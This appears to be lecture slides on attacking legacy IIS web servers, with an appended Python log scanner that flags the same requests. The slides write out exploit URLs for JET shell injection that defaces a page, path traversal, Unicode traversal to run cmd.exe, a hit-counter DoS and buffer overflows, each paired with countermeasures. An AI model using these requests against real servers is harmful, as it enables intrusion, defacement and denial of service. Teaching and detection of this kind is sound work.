Web Hacking
• Brute Force Password Guessing
• Vulnerabilities
• IIS
• …..

Brute Force Password Guessing
• Tools
  • Brutus, http://www.hoobie.net/brutus/brutus-download.html
  • “Dictionary file”

IIS Vulnerability
• Catalog_type.asp
  • NT ODBC Remote Compromise
  • Vulnerability of “JET data base engine” (for Windows NT)
  • SQL query +|shell(”instruction”)
  • |http://ipaddress/AdvWorks/equipment/catalog_type.asp?ProductType=|shell(“cmd+/c+echo Hacked By Somebody >c:\..default.html”)|
• Code.asp
  • A problem with String Matching
  • /ADvWorks, /ASPSamp
  • http://ipaddress/AdvWorks/code.asp?source=/AdvWorks/../../../winnt/win.ini
• Countermeasure
  • Remove these ASP

IIS vulnerability: FPcount
• DoS attack
  • http://ip address/_vti_bin/fpcount.exe?Page=default.htm|image=1Digits=20000
  • Reserves 476K per request
• Countermeasure
  • Remove fpcount.exe

IIS vulnerability: IIS Unicode
• %C1%9c: Unicode encoding of “\”
• http://ipaddress/scripts/..%c1%9c..\winnt\system32\cmd.exe?/c+dir
• /scripts: IIS’s default setting for this folder is executable
• Consequence: attackers can do anything they want, including

Countermeasure of Web Hacking
• Do not use IIS (refer to appendix A)
• Patch your Web Server
• Remove unnecessary services
  • IIS examples
    • Fpcount
    • ….. (check IIS vulnerability list)

IIS vulnerability: MDAC/RDS
• Msadcs.dll (same as Catalog_type.asp)
• Countermeasure
  • Patch document number: MS99-025
  • Remove it, if you don’t need it
  • Patch it, if you need it
    • Version of MDAC (check Msdadc.dll, Oledb32.dll)
    • MDAC 1.5: Upgrade to 2.1, handlerRequired (set DWORD value to 1)
    • MDAC 2.0: handlerRequired (set DWORD value to 1)
  • Delete RDS examples

IIS vulnerability: FrontPage98 dvwssr.dll
• Source code of ASP
  • Assumption: right to modify homepage
  • Encryption: (key: Netscape engineers are weenies)
  • Tool: dvwssr.exe (Perl code, written by “Rain Forest Puppy”)
• Buffer overflow
  • http://ip address/GET/_vti_aut/dvssr.dll?aaaaa…(5,000 “a” or whatever)
• Countermeasure: remove dvwssr.dll directly, or install Windows 2000, Office 2000 extensions, or FrontPage 2000 server extensions (these remove dvwssr.dll automatically)

IIS vulnerability: Malformed HTR Request (MS99-019)
• ISM.DLL (Buffer overflow)
• .htr
• http://ip address/aaaa…aaaaaaaaaaaaaa.htr (about 3,000 a)
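
For checking whether a server has already received the request shapes listed on these slides, the following is an added example (not part of the original slides) that scans web log lines for them. The log line format, rule names and thresholds are assumptions of this example, and the Unicode rule generalizes %c1%9c to any overlong two-byte UTF-8 sequence.

```python
import re

# Overlong two-byte UTF-8 always starts with byte C0 or C1 (e.g. %c1%9c for "\").
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)
DIGITS = re.compile(r"digits=(\d+)", re.I)
MAX_DIGITS = 10   # assumption: a hit counter never needs more digits than this
MAX_LEN = 1000    # assumption: well below the 3,000-5,000 byte requests on the slides

def classify(uri):
    """Return the names of the slide-deck patterns that a raw request URI matches."""
    path, _, query = uri.partition("?")
    p, q = path.lower(), query.lower()
    hits = []
    if "|shell(" in q or "%7cshell(" in q:
        hits.append("jet-shell")
    if p.endswith("/code.asp") and (".." in q or "%2e%2e" in q):
        hits.append("code.asp-traversal")
    m = DIGITS.search(q)
    if p.endswith("/fpcount.exe") and m and int(m.group(1)) > MAX_DIGITS:
        hits.append("fpcount-dos")
    if OVERLONG.search(uri):
        hits.append("unicode-traversal")
    if p.endswith("/dvwssr.dll") and len(query) > MAX_LEN:
        hits.append("dvwssr-overflow")
    if p.endswith(".htr") and len(path) > MAX_LEN:
        hits.append("htr-overflow")
    return hits

def scan(lines):
    """Yield (client_ip, rule) per match; assumed line format: 'ip method uri status'."""
    for line in lines:
        ip, _method, uri, _status = line.split()
        for rule in classify(uri):
            yield ip, rule

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    "192.0.2.10 GET /default.htm 200",
    "192.0.2.11 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 200",
    "192.0.2.12 GET /AdvWorks/code.asp?source=/AdvWorks/../../../winnt/win.ini 200",
    "192.0.2.13 GET /_vti_bin/fpcount.exe?Page=default.htm&Image=1&Digits=20000 200",
    "192.0.2.14 GET /" + "a" * 3000 + ".htr 500",
]

if __name__ == "__main__":
    for ip, rule in scan(SAMPLE):
        print(ip, rule)
```

A match after the countermeasures are applied (ASP samples, fpcount.exe and dvwssr.dll removed, patches installed) is still worth reviewing, since it shows who is probing the server.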